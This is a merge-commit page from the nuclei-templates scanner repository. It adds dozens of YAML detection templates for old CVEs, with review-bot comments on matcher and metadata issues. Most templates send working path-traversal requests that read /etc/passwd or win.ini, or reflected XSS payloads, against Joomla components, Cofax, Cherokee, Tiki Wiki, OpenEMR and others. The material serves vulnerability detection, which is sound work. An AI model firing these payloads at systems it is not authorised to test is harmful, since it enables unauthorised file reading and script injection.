Merge branch 'master' into dynamic_attributes

patch-1
forgedhallpass 2021-08-19 16:23:26 +03:00
commit 7b29be739e
266 changed files with 7370 additions and 1775 deletions


@ -9,6 +9,7 @@ on:
jobs: jobs:
build: build:
runs-on: ubuntu-latest runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
steps: steps:
- name: Checkout Repo - name: Checkout Repo
uses: actions/checkout@master uses: actions/checkout@master
@ -24,7 +25,7 @@ jobs:
env: env:
GO111MODULE: on GO111MODULE: on
run: | run: |
go get -v github.com/projectdiscovery/templates-stats go get -v github.com/projectdiscovery/templates-stats@main
shell: bash shell: bash
- name: Markdown Stats - name: Markdown Stats
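Review bot: The new `go get -v github.com/projectdiscovery/templates-stats@main` line still resolves to a moving branch head, so the stats build is not reproducible and any bad or compromised upstream commit flows straight into this workflow on the next run; pin it to a release tag or full commit SHA, e.g. `go get -v github.com/projectdiscovery/templates-stats@<tag-or-commit-sha>`. The same floating reference exists in the untouched context line `uses: actions/checkout@master`, which is worth pinning in the same pass. The added `if:` guard on `github.repository` and `github.ref` correctly keeps forks from running this job; the workflow's `on:` trigger and the remaining steps are outside the hunk.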

3
.gitignore vendored

@ -1,2 +1,5 @@
.idea/
.DS_Store .DS_Store
local/ local/
.checksum
.new-additions


@ -97,3 +97,4 @@ You can refer to the following articles of Git and GitHub basics. In case you ar
- **Nuclei** outcomes are only as excellent as **template matchers💡** - **Nuclei** outcomes are only as excellent as **template matchers💡**
- Declare at least two matchers to reduce false positive - Declare at least two matchers to reduce false positive
- Avoid matching words reflected in the URL to reduce false positive - Avoid matching words reflected in the URL to reduce false positive
- Avoid short word that could be encountered anywhere


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | | cve | 590 | dhiyaneshdk | 239 | cves | 597 | info | 583 | http | 1720 |
| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | | panel | 219 | pikpikcu | 237 | vulnerabilities | 265 | high | 465 | file | 46 |
| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | | xss | 215 | pdteam | 194 | exposed-panels | 221 | medium | 387 | network | 35 |
| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | | wordpress | 201 | daffainfo | 136 | exposures | 174 | critical | 226 | dns | 11 |
| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | | exposure | 196 | dwisiswant0 | 128 | technologies | 159 | low | 156 | | |
| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | | rce | 187 | geeknik | 127 | misconfiguration | 124 | | | | |
| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | | lfi | 176 | gy741 | 68 | takeovers | 70 | | | | |
| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | | cve2020 | 155 | madrobot | 60 | default-logins | 51 | | | | |
| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | | wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | |
| config | 90 | gaurang | 42 | workflows | 34 | | | | | | tech | 101 | gaurang | 42 | workflows | 35 | | | | |
**138 directories, 1709 files**. **144 directories, 1870 files**.
</td> </td>
</tr> </tr>




@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | | cve | 590 | dhiyaneshdk | 239 | cves | 597 | info | 583 | http | 1720 |
| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | | panel | 219 | pikpikcu | 237 | vulnerabilities | 265 | high | 465 | file | 46 |
| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | | xss | 215 | pdteam | 194 | exposed-panels | 221 | medium | 387 | network | 35 |
| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | | wordpress | 201 | daffainfo | 136 | exposures | 174 | critical | 226 | dns | 11 |
| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | | exposure | 196 | dwisiswant0 | 128 | technologies | 159 | low | 156 | | |
| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | | rce | 187 | geeknik | 127 | misconfiguration | 124 | | | | |
| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | | lfi | 176 | gy741 | 68 | takeovers | 70 | | | | |
| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | | cve2020 | 155 | madrobot | 60 | default-logins | 51 | | | | |
| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | | wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | |
| config | 90 | gaurang | 42 | workflows | 34 | | | | | | tech | 101 | gaurang | 42 | workflows | 35 | | | | |


@ -0,0 +1,26 @@
id: CVE-2005-4385
info:
name: Cofax <= 2.0RC3 XSS
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
reference:
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
author: geeknik
severity: medium
tags: cofax,xss,cve,cve2005
requests:
- method: GET
path:
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "'>\"</script><script>alert(document.domain)</script>"
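Review bot: The matchers at the end of this template accept any 200 response whose body echoes the payload, with no check that the response is served as HTML, so a JSON or plain-text endpoint that reflects the query string would be reported as an XSS finding. The sibling XSS templates in this commit (CVE-2006-1681, CVE-2011-4336) add a `part: header` word matcher for `text/html` under the same `matchers-condition: and`; adding that third matcher here keeps the false-positive rate consistent with the rest of the commit and with the contributing guide's "at least two matchers" rule.
```yaml
    matchers:
      # … unchanged: status and body-word matchers …
      - type: word
        part: header
        words:
          - text/html
```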


@ -0,0 +1,30 @@
id: CVE-2006-1681
info:
name: Cherokee HTTPD <=0.5 XSS
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
reference:
- https://www.securityfocus.com/bid/17408
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
author: geeknik
severity: medium
tags: cherokee,httpd,xss,cve,cve2006
requests:
- method: GET
path:
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
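Review bot: The `status` matcher requires `200`, but the description says the script is reflected in the HTTP 400 error page that a malformed request produces, so a server behaving exactly as described would fail the `matchers-condition: and` and be reported clean. If the reflection really lives in the error response, add `- 400` under `status:` (or drop the status matcher and rely on the body and `text/html` header checks). If the template was verified against a 200 response instead, a one-line comment recording that, e.g. `# verified: vulnerable builds return 200 for this path`, would stop the next reader from "fixing" it.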


@ -0,0 +1,27 @@
id: CVE-2008-4668
info:
name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/6618
- https://www.cvedetails.com/cve/CVE-2008-4668
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
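Review bot: `reference: |` turns the two URLs into a single literal block string whose content begins with `- `, not a YAML sequence; the geeknik templates in this same commit (CVE-2005-4385, CVE-2006-1681, CVE-2008-6668) write `reference:` followed by a real list, which is presumably what the consumer expects when it renders references individually. Replace `reference: |` with `reference:` and keep the two `- https://…` lines as list items. The same `reference: |` appears in CVE-2008-4764, CVE-2008-6172, CVE-2009-5114, every CVE-2010-* template, CVE-2011-4336, CVE-2011-4804, CVE-2012-0991, CVE-2012-4253, CVE-2013-5979, CVE-2014-4535, CVE-2014-4536, CVE-2014-5368, CVE-2014-8799 and CVE-2015-2807 in this commit.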


@ -0,0 +1,27 @@
id: CVE-2008-4764
info:
name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
reference: |
- https://www.exploit-db.com/exploits/5435
- https://www.cvedetails.com/cve/CVE-2008-4764
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2008-6172
info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
reference: |
- https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2008-6668
info:
name: nweb2fax <= 0.2.7 Directory Traversal
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
reference:
- https://www.exploit-db.com/exploits/5856
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
author: geeknik
severity: high
tags: nweb2fax,lfi,cve,cve2008
requests:
- method: GET
path:
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex:
- "root:.*:0:0:"


@ -0,0 +1,27 @@
id: CVE-2009-5114
info:
name: WebGlimpse 2.18.7 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
reference: |
- https://www.exploit-db.com/exploits/36994
- https://www.cvedetails.com/cve/CVE-2009-5114
tags: cve,cve2009,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-0943
info:
name: Joomla! Component com_jashowcase - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
reference: |
- https://www.exploit-db.com/exploits/11090
- https://www.cvedetails.com/cve/CVE-2010-0943
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-0944
info:
name: Joomla! Component com_jcollection - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/11088
- https://www.cvedetails.com/cve/CVE-2010-0944
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1353
info:
name: Joomla! Component LoginBox - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12068
- https://www.cvedetails.com/cve/CVE-2010-1353
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1474
info:
name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12182
- https://www.cvedetails.com/cve/CVE-2010-1474
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1495
info:
name: Joomla! Component Matamko 1.01 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12286
- https://www.cvedetails.com/cve/CVE-2010-1495
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1602
info:
name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12283
- https://www.cvedetails.com/cve/CVE-2010-1602
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1657
info:
name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12428
- https://www.cvedetails.com/cve/CVE-2010-1657
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1722
info:
name: Joomla! Component Online Market 2.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12177
- https://www.cvedetails.com/cve/CVE-2010-1722
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1875
info:
name: Joomla! Component Property - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/11851
- https://www.cvedetails.com/cve/CVE-2010-1875
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1953
info:
name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12288
- https://www.cvedetails.com/cve/CVE-2010-1953
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1955
info:
name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12238
- https://www.cvedetails.com/cve/CVE-2010-1955
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1979
info:
name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12088
- https://www.cvedetails.com/cve/CVE-2010-1979
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1983
info:
name: Joomla! Component redTWITTER 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php
reference: |
- https://www.exploit-db.com/exploits/12055
- https://www.cvedetails.com/cve/CVE-2010-1983
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-2033
info:
name: Joomla Percha Categories Tree 0.6 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
- https://www.cvedetails.com/cve/CVE-2010-2033
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
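Review bot: The `description` names the Percha Fields Attach (com_perchafieldsattach) component 1.x, while `name` and the request path target Percha Categories Tree 0.6 via `option=com_perchacategoriestree`, so one of the two appears to have been copied from a different advisory. Verify against the packetstorm reference and the CVE record, then make the description name the component the request actually probes (something like `Directory traversal vulnerability in the Percha Categories Tree (com_perchacategoriestree) component 0.6 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.`, drafted from the name and path here), or correct the path if the description is the accurate half.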


@ -0,0 +1,27 @@
id: CVE-2010-2259
info:
name: Joomla! Component com_bfsurvey - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/10946
- https://www.cvedetails.com/cve/CVE-2010-2259
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-2682
info:
name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/14017
- https://www.cvedetails.com/cve/CVE-2010-2682
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-4617
info:
name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/15791
- https://www.cvedetails.com/cve/CVE-2010-4617
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: CVE-2010-5278
info:
name: MODx manager - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
reference: |
- https://www.exploit-db.com/exploits/34788
- https://www.cvedetails.com/cve/CVE-2010-5278
tags: cve,cve2010,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body
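Review bot: The single path reads `windows/win.ini` and the word matcher keys on its `fonts` and `extensions` sections, so a MODx Revolution install on a non-Windows host never matches and is reported clean even when vulnerable. The sibling LFI templates in this commit check a POSIX file with a `root:.*:0:0` regex; mirroring that in a second path and matcher would cover both, but note that the current `matchers-condition: and` can never be satisfied by one response for both OS probes, so the matcher structure would have to change with it. If the template is intentionally Windows-only, a comment such as `# win.ini probe: only detects Windows hosts` above `path:` documents the gap.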


@ -0,0 +1,33 @@
id: CVE-2011-4336
info:
name: Tiki Wiki CMS Groupware 7.0 has XSS
author: pikpikcu
severity: medium
description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2011-4336
- https://www.securityfocus.com/bid/48806/info
- https://seclists.org/bugtraq/2011/Nov/140
tags: cve,cve2011,xss,tikiwiki
requests:
- method: GET
path:
- "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html


@ -0,0 +1,27 @@
id: CVE-2011-4804
info:
name: Joomla! Component com_kp - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/36598
- https://www.cvedetails.com/cve/CVE-2011-4804
tags: cve,cve2011,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
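Review bot: The `name` and the request path target `com_kp`, but the `description` describes the obSuggest (com_obsuggest) component before 1.8, so the metadata contradicts the probe in the same way as the CVE-2010-2033 template in this commit. Check exploit-db 36598 and the CVE record to see which component CVE-2011-4804 actually covers, then either rewrite the description to match `option=com_kp` or change the path to the component the description names; as written, a reader triaging a hit cannot tell which product is affected.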


@ -0,0 +1,27 @@
id: CVE-2012-0991
info:
name: OpenEMR 4.1 - Local File Inclusion
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
reference: |
- https://www.exploit-db.com/exploits/36650
- https://www.cvedetails.com/cve/CVE-2012-0991
tags: cve,cve2012,lfi,openemr
requests:
- method: GET
path:
- "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
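Review bot: The `description` states the traversal is reachable by "remote authenticated users", yet the request is a bare unauthenticated GET to `contrib/acog/print_form.php` with no session cookie, so either that one of the four listed vectors is reachable without login and the description should say so, or the template can never match a target that enforces authentication. The exploit-db reference should settle which; if the unauthenticated path was confirmed, record it in the description, e.g. append `The contrib/acog/print_form.php vector is reachable without authentication.`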


@ -0,0 +1,27 @@
id: CVE-2012-4253
info:
name: MySQLDumper 1.24.4 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
reference: |
- https://www.exploit-db.com/exploits/37129
- https://www.cvedetails.com/cve/CVE-2012-4253
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,28 @@
id: CVE-2013-5979
info:
name: Xibo 1.2.2/1.4.1 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/26955
- https://www.cvedetails.com/cve/CVE-2013-5979
- https://bugs.launchpad.net/xibo/+bug/1093967
tags: cve,cve2013,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,31 @@
id: CVE-2014-4535
info:
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
